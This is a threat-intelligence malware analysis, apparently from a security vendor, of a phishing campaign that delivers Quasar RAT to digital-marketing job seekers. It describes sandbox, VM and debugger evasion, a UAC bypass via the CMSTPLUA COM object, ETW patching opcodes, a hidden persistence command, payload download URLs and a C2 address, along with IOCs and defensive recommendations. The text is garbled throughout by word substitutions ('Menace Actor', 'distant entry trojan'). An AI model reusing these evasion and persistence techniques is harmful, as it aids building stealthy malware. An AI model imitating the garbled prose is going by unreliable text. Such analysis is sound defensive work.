Key takeaways
- Cyble Analysis and Intelligence Labs (CRIL) uncovered a complicated multi-stage malware assault originating from an archive file that accommodates a malicious LNK file.
- The lure doc noticed within the marketing campaign signifies that the Menace Actor (TA) is concentrating on job seekers and digital advertising professionals, particularly these concerned with Meta Advertisements.
- The malware employs a number of methods to detect digital machine environments, evading detection and evaluation in sandboxed or emulated environments.
- The malware makes use of a number of anti-debugging methods to detect whether it is being debugged, making evaluation or reverse engineering more difficult.
- The malware employs protection evasion methods, together with disabling occasion tracing and altering in-memory features, to evade detection by safety instruments.
- The malware makes an attempt to escalate privileges to administrative ranges utilizing totally different approaches and units up persistence by hiding in system directories, making certain continued execution even after system reboots.
- The malware employs AES encryption in a number of phases of execution to hide the malicious payload, which is just decrypted in reminiscence after passing anti-virtualization and anti-debugging checks. This technique makes it troublesome for static evaluation engines to detect the menace, because the payload stays hidden till runtime.
- The ultimate stage of the assault deploys Quasar RAT, a well known open-source distant entry trojan, granting attackers full management over the compromised system. This entry permits actions comparable to knowledge theft, surveillance, and additional exploitation of the system, making it a flexible device for malicious functions.
- This marketing campaign has been attributed to a Vietnamese Menace Actor primarily based on its particular concentrating on of Meta Advertisements digital advertising professionals and the instruments employed. The techniques and methods used on this assault carefully align with a earlier marketing campaign recognized in July 2022, reinforcing the connection to the identical menace group.
Overview
Cyble Analysis and Intelligence Lab (CRIL) has uncovered a complicated assault marketing campaign that doubtless originates from spam emails containing phishing attachments. These emails embrace an archive file with an LNK file disguised as a PDF file. The assault begins when the LNK file triggers PowerShell-based instructions, which proceed to obtain and execute extra scripts hosted externally. These scripts are extremely encoded and obfuscated to evade detection by safety instruments. The TAs use quite a lot of evasion methods, together with checks for digital machines, sandbox environments, and debugging instruments, making certain that the malicious code can stay undetected and performance stealthily in non-virtualized environments whereas bypassing customary safety defenses.
As soon as the setting is confirmed to be free from sandboxing or evaluation, the payload is decrypted utilizing hardcoded keys, ensuing within the execution of Quasar RAT. On this ultimate stage, attackers achieve full management over the compromised system, permitting them to conduct a variety of malicious actions, together with knowledge exfiltration, persistent entry, knowledge theft, and even deploying extra malware.
In July 2022, a Vietnamese menace group started spreading Ducktail malware, an info-stealer concentrating on digital advertising professionals. Over time, the group expanded its operations, distributing extra data stealers and distant entry trojans (RATs). In addition they leveraged Malware-as-a-Service (MaaS) to facilitate payload supply, making their campaigns extra versatile and scalable.
This marketing campaign is attributed to the Vietnamese menace group on account of a number of indicators: the selection of goal victims, the instruments employed within the assaults, the payload supply mechanisms, and the creation of lure paperwork. These parts carefully mirror the techniques, methods, and procedures (TTPs) noticed in earlier campaigns recognized by WithSecure, additional linking this marketing campaign to the identical group. We have now noticed that the TA behind this marketing campaign can also be delivering malware households comparable to Stromkitty. The determine beneath reveals the execution movement of this marketing campaign.
Technical Evaluation
Cyble Analysis and Intelligence Lab (CRIL) has recognized a marketing campaign that leverages a malicious LNK file containing a PowerShell command designed to obtain and execute a further PowerShell script hosted on Dropbox utilizing the hyperlink: hxxps://www.dropbox[.]com/scl/fi/b9diosgl68vg9xlaytsbz/sav3_encrypt[.]txt?rlkey=k2ojylfvks6xyef3vb21n45gp&st=suprpdhv&dl=1. That is carried out by utilizing the Invoke-Expression (IEX) and Invoke-RestMethod (irm) PowerShell instructions from the LNK file
As soon as downloaded, the script accommodates two elements encoded in base64: a lure PDF file and a batch file. These are decoded and saved to the Downloads folder as “PositionApplied_VoyMedia.pdf” and “output.bat.” The script then executes these recordsdata utilizing the “Begin-Course of” PowerShell command.
Lure Doc Evaluation:
The potential goal of this assault is probably going job seekers or professionals within the digital advertising, e-commerce, or efficiency advertising sectors, significantly these specializing in Meta (Fb, Instagram) Advertisements inside the US. Figures 4 and 5 beneath present the lure doc used on this marketing campaign.
Output.bat
Upon execution, the “output.bat” file retrieves the disk drive kind and producer identify utilizing WMIC instructions to detect if the system is working in a digital machine. It checks for disk sorts comparable to “DADY HARDDISK”, “WDS100T2B0A” or “QEMU HARDDISK” and producers like “BOCHS_”, “BXPC___”, “QEMU“, or “VirtualBox“. If any of those checks point out a digital setting, the script exits with out additional execution. Nonetheless, if no digital machine is detected, it proceeds to execute one other obfuscated PowerShell script. The method tree beneath illustrates how malware checks the digital setting.
The de-obfuscated PowerShell code is proven beneath
The PowerShell script reads the content material of the “output.bat” file by scanning every line that begins with “:: “ and extracts a substring. A separator is used to separate the road into two units of base64 strings. These base64 strings are then decoded and handed by an AES decryption course of utilizing a hardcoded key and IV, each of that are base64 encoded. After decryption, the information is decompressed utilizing a GZip stream, and the ensuing output is executed utilizing Invoke-Expression by PowerShell.exe, as proven in Determine 7.
The decrypted payload leads to a .NET executable, which is executed in reminiscence by way of Invoke-Expression. It then carries out a sequence of detection-evasion checks utilizing numerous strategies outlined throughout the .NET loader.
Triage setting verify
This methodology performs a verify for a Triage sandbox by querying the disk drive mannequin utilizing the command “SELECT * FROM Win32_DiskDrive”. It retrieves the mannequin of the disk drive and compares it with “DADY HARDDISK” or “QEMU HARDDISK”. Moreover, it checks the Triage sandbox VM’s desktop wallpaper by evaluating the bytes of the present wallpaper picture file with a hardcoded set of bytes. If both of those checks detects the presence of Triage, this system throws an exception and halts execution.
Checks for Qemu
This methodology checks if the system is working in a QEMU digital setting by looking for particular QEMU-related recordsdata within the system listing. It iterates by all of the recordsdata within the system folder and checks if any file names comprise the strings “qemu-ga” or “qemuwmi”. If a match is discovered, the strategy returns true; in any other case, it returns false.
Checks for Parallels
This methodology checks if the system is working in a Parallels digital setting by looking for particular Parallels-related recordsdata within the system listing. It seems to be for file names containing the strings “prl_sf”, “prl_tg”, or “prl_eth”. If any of those strings are discovered within the system folder, the strategy returns true; in any other case, it returns false.
Sandbox Detection
These strategies are designed to detect the presence of varied sandboxing options by checking if particular DLL modules are loaded within the system. The malware detects Sandboxie by in search of the “SbieDll.dll” module, and if discovered, the strategy is designed to crash the Sandboxie setting. Equally, the Comodo sandbox is recognized by looking for both the “cmdvrt32.dll” or “cmdvrt64.dll” modules, whereas the Qihoo 360 sandbox is detected by checking for the “SxIn.dll” module. For Cuckoo sandbox detection, the system searches for the “cuckoomon.dll” module. If any of those modules are discovered, the system returns true, indicating a sandbox setting. Within the case of Sandboxie, it deliberately crashes the setting.
Emulation setting checks
This methodology checks for emulation by measuring the system’s tick depend earlier than and after a 500-millisecond pause. If the time distinction is lower than 500 milliseconds, it suggests the system could also be working in an emulated setting, returning true. In any other case, it returns false.
Username checks
This methodology checks if the present system’s username matches any frequent usernames usually related to digital machines, sandboxes, or check environments. It converts the present username to lowercase and compares it towards a predefined record, which incorporates names like “Johnson,” “Miller,” “malware,” “Sandbox,” ”virus,” ”John Doe,” “check consumer,” “sand field,” “WDAGUtilityAccount,” “DefaultUser,” If a match is discovered, it returns true, indicating that the system is working below digital setting. In any other case, it returns false.
Wine Emulator verify
This methodology checks if the system is working in a Wine setting by in search of the presence of the “wine_get_unix_file_name” operate within the kernel32.dll module. If the operate is discovered, it returns true, indicating Wine is current; in any other case, it returns false.
VMWare verify
This methodology checks if the system is working in a VMware or VirtualBox digital setting by querying the “Choose * from Win32_ComputerSystem”. It retrieves the producer and mannequin data of the system. If the producer is “Microsoft Company” and the mannequin accommodates “VIRTUAL,” or if the producer accommodates “vmware,” it returns `true`, indicating the presence of a digital setting. If no such situations are met, it returns false.
KVM verify
This methodology checks if the system is working in a KVM (Kernel-based Digital Machine) setting by looking for particular KVM-related drivers within the system listing. It seems to be for file names comparable to “balloon.sys“, “netkvm.sys“, “vioinput“, “viofs.sys”, and “vioser.sys”. If any of those recordsdata are discovered, it returns true, indicating a KVM setting.
Hyper-V verify
This methodology checks if the system is working in a Hyper-V setting by inspecting the providers at present working. It seems to be for providers with names that comprise “vmbus”, “VMBusHID”, or “hyperkbd”. If any of those providers are discovered, it returns true, indicating the presence of Hyper-V.
Test for VMWare-related recordsdata
This methodology checks for the presence of digital machine/Digital box-related recordsdata and directories to detect a digital setting. It searches the system listing for particular recordsdata like “VBoxMouse.sys”, “VBoxGuest.sys”, “VBoxSF.sys”, “VBoxVideo.sys”, “vmmouse.sys”, “vboxogl.dll”, and “vmmouse.sys” which can be related to VMware or VirtualBox. Moreover, it checks for the existence of directories like “C:Program RecordsdataVMware” or “C:Program Recordsdataoraclevirtualbox visitor additions”. If any of those recordsdata or directories are discovered, it returns true, indicating the system is working in a digital machine.
VMProcess Checks
This Technique checks for the presence of processes related to digital machine environments by looking for particular course of names, comparable to “vboxservice,” “VGAuthService,” “vmusrvc,” and “qemu-ga.” If any of those processes are discovered working on the system, it returns true, indicating the presence of a digital machine. If none of those processes are detected, it returns false.
System Test
This methodology checks for the presence of particular digital machine-related machine recordsdata by trying to open paths comparable to .pipecuckoo, .HGFS, .vmci, .VBoxMiniRdrDN, .VBoxGuest , .pipeVBoxMiniRdrDN , .VBoxTrayIPC. If any of those machine recordsdata are efficiently opened, it closes the file and returns true, indicating the system is probably going working in a digital machine.
Working System Version verify
This methodology checks if the working system is an Enterprise, Enterprise, or Server version by querying the Win32_OperatingSystem class and retrieving the OS identify from the “Caption” area. If the OS identify accommodates the phrases “Enterprise,” “Enterprise,” or “Server,” it returns true, indicating that the system is working one in all these editions.
If any of the above-mentioned strategies return “True”, this system triggers an exception, halting the execution and stopping the supposed malicious exercise from being executed.
After these environmental checks, this system proceeds to evaluate whether or not it’s being debugged. This stage usually includes extra scrutiny for indicators of a debugging course of or sandbox setting, comparable to monitoring for hooked up debuggers or figuring out system artifacts that counsel this system is working below commentary.
DebuggerAttached
This methodology performs numerous checks to detect if a debugger is hooked up to the present course of. It checks for a debugger utilizing customary .NET strategies and by querying system data by way of the “NtQueryInformationProcess” operate. These checks search for particular flags, ports, and object handles that point out the presence of a debugger. If any of those situations are met, the strategies return `true`, indicating that the method is being debugged.
Utilizing NtSetInformationThread
This methodology makes an attempt to cover threads from a debugger by iterating by the present course of’s threads. It opens every thread and makes use of the “NtSetInformationThread” operate to cover it. If the operation succeeds for all threads, it returns “Success”; in any other case, if an error happens, it returns “Failed.”
Utilizing PageGuard
This methodology allocates a block of reminiscence utilizing “VirtualAlloc” and units particular protections to detect if a debugger is current. It writes knowledge to the allotted reminiscence and adjustments its safety to incorporate guard pages. If an exception is triggered when executing code from this reminiscence block, it signifies the presence of a debugger, returning false. If no exception happens, the reminiscence is freed, and it returns true, indicating no debugger is detected.
Utilizing {Hardware} Breakpoints
This code checks for {hardware} breakpoints by retrieving the present thread’s context, particularly the debug registers. If any of the debug registers (Dr1, Dr2, Dr3, Dr4, Dr5, Dr6, or Dr7) comprise non-zero values, it signifies the presence of a {hardware} breakpoint, returning true. If no breakpoints are detected, it returns false.
Debugger connect
This methodology makes an attempt to stop debugging by modifying the conduct of particular features in ntdll.dll. It retrieves the addresses of DbgUiRemoteBreakin and DbgBreakPoint and overwrites them with customized directions (0xCC for DbgUiRemoteBreakin and 0xC3 for DbgBreakPoint). If the reminiscence modification is profitable, it returns “Success”; in any other case, it returns “Failed.”
If any of the above strategies detect that the method is being debugged, this system instantly triggers an exception. This motion successfully halts additional execution and prevents this system from persevering with its operations.
Antivirus verify
Upon execution, this system particularly checks for antivirus merchandise like Kaspersky, BitDefender, or Avast Antivirus. Nonetheless, the presence of those safety merchandise on the system doesn’t intervene with or halt this system’s execution. It continues working as supposed.
Privilege Escalation
As soon as the .NET executable completes its checks, it verifies if it has administrative privileges. If not, it modifies the Course of Atmosphere Block (PEB) of the present course of to vary its picture path and command line to “C:Windowsexplorer.exe“. After modifying the PEB, it initiates a brand new occasion of the present course of utilizing a PowerShell command with the “-Verb runas” possibility, working the method in hidden mode with elevated admin privileges.
If the PowerShell methodology fails for any motive, the method switches to an alternate method by invoking a COM object (CMSTPLUA) utilizing the CLSID “3E5FC7F9-9A51-4367-9063-A120244FBEC7” with the prefix “Elevation:Administrator!new:”. It then calls ShellExec to launch a brand new occasion of the present course of with elevated administrative privileges.
Persistence
After attaining privilege escalation, the .NET executable checks the method’s origin to find out whether or not it’s working from the “Home windows” listing. If the method will not be working from this listing, it units up persistence by making a hidden folder named “$rbx-onimai” within the “C:Home windows” listing and copies itself into this folder as “$rbx-CO2.bat”. The unique file positioned within the “Downloads” folder is then deleted. Afterward, it initiates a brand new occasion from the “C:Home windows$rbx-onimai” folder utilizing the next command.
Command : cmd.exe /C echo Begin-Course of -FilePath C:Home windows$rbx-onimal$rbx-CO2.bat -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
It additionally creates a run entry by modifying the registry key of “SOFTWAREMicrosoftWindowsCurrentVersionRun$rbx-XVR” to level to the newly copied file, making certain it runs robotically after restart.
Protection Evasion
Upon Execution, the .Internet executable modifies the “EtwEventWrite” operate in ntdll.dll to disable occasion tracing by inserting particular opcode code.
- On 32-bit techniques, it replaces the operate with the opcodes “0xC2, 0x14”, which interprets to the meeting instruction RETN 20. This causes the operate to return early and bypass its regular operations.
- On 64-bit techniques, it makes use of the opcode “0xC3”, which corresponds to the instruction RET, making the operate return instantly.
After this, it decrypts knowledge from its useful resource part labeled “1789d7d0-48bf-48f5-bad6-e0262117d577.tmp” utilizing AES decryption with a hardcoded base64 key and IV. The decrypted knowledge is subsequently decompressed utilizing GZip.
Quasar RAT
Within the ultimate step, the .NET executable runs the decompressed payload utilizing the Invoke command. The payload has been recognized as Quasar RAT, however the menace actor has made a number of modifications, comparable to altering the certificates identify and different references the place “Quasar RAT” usually seems. These alterations are doubtless supposed to evade detection and attribution.
Quasar RAT configuration:
| Discipline | Worth |
| Tag | Workforce |
| model | 1.7.3 |
| Hosts | “144.76.68.248:4782;” |
| Sub-Listing | “$cnt-onimai2” |
| Set up Title | “$cnt-CO2.exe” |
| Mutex | “928569f3-e524-4f67-936e-0d7f0a47cfad” |
| Startup Key | “$cnt-Onimai” |
| Log Listing identify | “$cnt-Logs” |
Extra Info:
Moreover, this system contains a number of checks designed to detect debuggers and consider the system’s setting, although these particular strategies are usually not straight known as. This implies that the TA might have carried out these checks as a part of a extra in depth anti-debugging or evasion mechanism. By leaving these strategies dormant, the TA retains the choice to allow additional checks sooner or later, enhancing this system’s potential to evade detection or evaluation in debugging or virtualized environments.
Evaluation Instruments verify
This methodology checks for debugging or reverse engineering instruments by looking for particular course of window titles or the foreground window’s title. It seems to be for instruments like x32dbg, x64dbg, windbg, ollydbg, dnspy, immunity debugger, hyperdbg, cheat engine, cheatengine, ida, and wireshark. If any of those instruments are detected within the course of record or as the present foreground window, it both closes the method or flags their presence by returning true. If none are discovered, it returns false.
OutputDebug string
This code makes an attempt to detect a debugger by logging a message and checking the results of “GetLastWin32Error()”, returning true if no error is discovered. Moreover, it logs a specifically crafted format string to probably exploit vulnerabilities in sure debuggers like OllyDbg by flooding it with “%s” format specifiers.
Drivers Execution verify
These two strategies verify whether or not unsigned drivers and test-signed drivers are allowed to run on the system by querying the system’s Code Integrity settings utilizing NtQuerySystemInformation. That is carried out to judge if the machine could possibly be a possible malware-testing setting. If unsigned drivers are allowed, the strategy returns True. Equally, if test-signed drivers are permitted, it additionally returns True.
Kernel Debugging verify
The tactic checks if kernel debugging is energetic on the system. It does so by querying the system data utilizing the “NtQuerySystemInformation” operate (with a particular system data class ‘35’). It retrieves the standing of the kernel debugger by the “SYSTEM_KERNEL_DEBUGGER_INFORMATION” construction. The tactic returns true if both the kernel debugger is enabled or current however not energetic. In any other case, it returns false.
This verify helps decide if the system is being debugged, which might be helpful in detecting potential check environments.
SecureBoot Test
The tactic checks if Safe Boot is enabled on the system. It queries system data utilizing NtQuerySystemInformation with a system data class 145 to retrieve Safe Boot standing by way of the SYSTEM_SECUREBOOT_INFORMATION construction. The tactic returns true if the system is Safe Boot succesful and Safe Boot is enabled. In any other case, it returns false.
Virtualization Test
This methodology checks if Virtualization-Based mostly Safety (VBS) is enabled on the system. It queries the system utilizing WMI to verify the encryption standing of the system quantity (C: drive) by the Win32_EncryptableVolume class. The tactic returns true if the amount’s “ProtectionStatus” is 1, indicating that encryption is enabled (suggesting VBS is energetic). If any errors happen throughout the question, the strategy catches the exception and returns false.
Reminiscence Integrity verify
This methodology checks if Reminiscence Integrity (also called Hypervisor-Enforced Code Integrity) is enabled on the system. It reads a particular registry key: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlDeviceGuardScenariosHypervisorEnforcedCodeIntegrity. If the Enabled worth within the registry secret’s set to 1, the strategy returns true, indicating that Reminiscence Integrity is enabled. If the important thing or worth will not be current or an error happens, the strategy returns false.
Invoke Meeting verify
This methodology checks whether or not the at present executing meeting (this system) is working from a unique location than the applying’s anticipated executable path. It does this by evaluating the situation of the executing meeting (Meeting.GetExecutingAssembly().Location) with the applying’s executable path (Utility.ExecutablePath). In the event that they differ, the strategy returns true, indicating that the meeting might have been invoked or loaded from an uncommon or exterior location.
The code performs a number of safety checks to find out if the system is probably insecure or used for malware testing. It checks situations like whether or not unsigned drivers are permitted, whether or not Safe Boot is disabled, kernel debugging is energetic, and whether or not key safety features like Virtualization-Based mostly Safety and Reminiscence Integrity are turned off. It additionally verifies if this system is working from an surprising location. Moreover, it cross-checks the username towards an inventory of blacklisted names generally related to testing environments. If any of those checks set off a flag, and the username matches a blacklisted identify, this system throws an exception, stopping any malicious exercise from continuing.
Conclusion
This assault demonstrates a complicated, multi-layered method to deploying the Quasar RAT, utilizing a seemingly benign LNK file because the preliminary entry level. By way of using sandbox evasion, anti-virtualization checks, and privilege escalation methods (comparable to PowerShell and CMSTP), the TA ensures that the payload bypasses detection and establishes persistent management over compromised techniques.
The employment of AES encryption for the payload, together with anti-debugging methods and superior .NET-based obfuscation, illustrates the attackers’ sturdy concentrate on evading conventional safety options and complicating the evaluation and reverse engineering course of. The modular construction of the assault, with some evasion methods left unused however able to deploy primarily based on the goal setting, underscores the menace actor’s adaptability and functionality to beat various ranges of protection.
This marketing campaign aligns carefully with the continued operations of a Vietnamese menace group that has been energetic since July 2022. The group initially unfold Ducktail malware, concentrating on digital advertising professionals. Over time, the group has developed, increasing its operations by using Malware-as-a-Service (MaaS) and replicating its techniques, methods, and procedures (TTPs) throughout a number of campaigns.
Suggestions
- Guarantee sturdy electronic mail safety instruments are in place to detect and block malicious electronic mail attachments, comparable to LNK recordsdata or suspicious hyperlinks. Superior filtering techniques with AI and machine studying will help detect uncommon patterns and phishing makes an attempt that will bypass conventional safety filters.
- PowerShell is a typical device leveraged in assaults. Monitor its utilization by way of logging, limit execution insurance policies to signed scripts, and implement strict insurance policies on script execution to stop unauthorized scripts from working. Disable or restrict PowerShell on techniques the place it’s pointless to mitigate danger.
- Implement safety options that make the most of behavioral evaluation to detect uncommon system actions, comparable to course of injection, sandbox evasion methods, or modifications to important features like EtwEventWrite. These instruments can flag irregular conduct in actual time and stop assaults earlier than they escalate.
- Be certain that customers function with the least privileges needed for his or her roles. Restrict administrative entry and limit execution of probably dangerous scripts or processes, like PowerShell, to cut back the chance of privilege escalation.
- Maintain all techniques, software program, and antivirus options up to date with the newest patches. Common updates assist shield towards vulnerabilities that menace actors usually exploit to ship malicious payloads or execute privilege escalation methods.
MITRE ATT&CK® Strategies
| Tactic | Method | Process |
| Preliminary Entry (TA0001) | Phishing (T1566) | The LNK file in a RAR archive could also be delivered by phishing or spam emails. |
| Execution (TA0002) | Command and Scripting Interpreter: PowerShell (T1059.001) | The LNK file executes PowerShell instructions |
| Execution (TA0002) | Home windows Command Shell (T1059.003) | Makes use of cmd.exe to execute wmic and findstr instructions |
| Persistence (TA0003) | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001) | Added Run entry by modifying the Registry key |
| Privilege Escalation (TA0004) | CMSTP (T1218.003) | CMSTPLUA is used for UAC bypass |
| Protection Evasion (TA0005) | Obfuscated Recordsdata or Info: LNK Icon Smuggling (T1027.012) | LNK file comes with PDF Icon |
| Protection Evasion (TA0005) | Obfuscated Recordsdata or Info: Encrypted/Encoded File (T1027.013) | TA decrypts the payload utilizing AES decryption |
| Protection Evasion (TA0005) | Disabling Safety Instruments (T1562.001) | EtwEventWrite operate in ntdll.dll is modified to disable occasion tracing |
| Protection Evasion (TA0005) | Virtualization/Sandbox Evasion (T1497) | Checks for digital environments (e.g., QEMU, VirtualBox, VMware, Sandboxie) |
| Protection Evasion (TA0005) | Course of Injection (T1055) | Invoke-Expression is used to invoke decrypted payloads |
| Discovery (TA0007) | Question Registry (T1012) | The script queries registry keys to assemble system data for additional checks, together with checks associated to virtualization. |
| Discovery (TA0007) | System Info Discovery (T1082) | Utilizing Home windows Administration Instrumentation Management gathers system data. |
| Command and Management (TA0011) | Encrypted Channel (T1573) | The ultimate payload, Quasar RAT, establishes C2 communication over an encrypted channel (AES encryption utilized in earlier levels). |
| Command and Management (TA0011) | Utility Layer Protocol (T1071) | After the payload is executed, the Quasar RAT communicates with its C2 server over customary HTTP or different software layer protocols. |
Indicators Of Compromise
| Indicators | Indicator Kind | Description |
| dc616cc55a345e448a058368aea7c99ab9dd2a9c8ec42674312b66dbc29b7878 | SHA-256 | Career_Development_Plan_for_Meta_Ads_Specialist_Hotpoint_With_Numerical.rar |
| 3de5e0b27c69c93b4c4b4812ed4453d4b81e99b7d407640a752e62e33b1ede2a | SHA-256 | Career_Development_Plan_for_Meta_Ads_Specialist_Hotpoint_With_Numerical/Career_Development_Plan_for_Meta_Ads_Specialist_Hotpoint_With_Numerical.lnk |
| hxxps://www.dropbox.com/scl/fi/9p8no6tz85e09vg59kfwk/sav2_encrypt.txt?rlkey=hw7c83mq8uws216q3d4b1cfyi&st=4oycb9or&dl=1 | URL | URL from LNK |
| 9a00d0859bc7a81d6e289a414c39aa2bd95319fa3d1d0e5f1be6d348604d640c | SHA-256 | payload_1.ps1 (downloaded from Dropbox) |
| b35452610c2cbc5a6a2bebd82af7c3883037b40be7072e43fc5989298bb26ea5 | SHA-256 | PositionApplied_VoyMedia.pdf <house> .lnk |
| d8bc59a1acf2f9a14a2fb96de979672dbed27d798eecc9454021f352f2bf973a | SHA-256 | PositionApplied_VoyMedia.rar |
| 16ef774020e5754e4a8890789b7c798376a9521823c8897f9c97af5b33b27013 | SHA-256 | payload_1.bin |
| 8229f281a93f18612a47843aa69e94312b52180e7f775fd58e5ea04608e23bd0 | SHA-256 | LNK file delivers stromkitty |
Associated
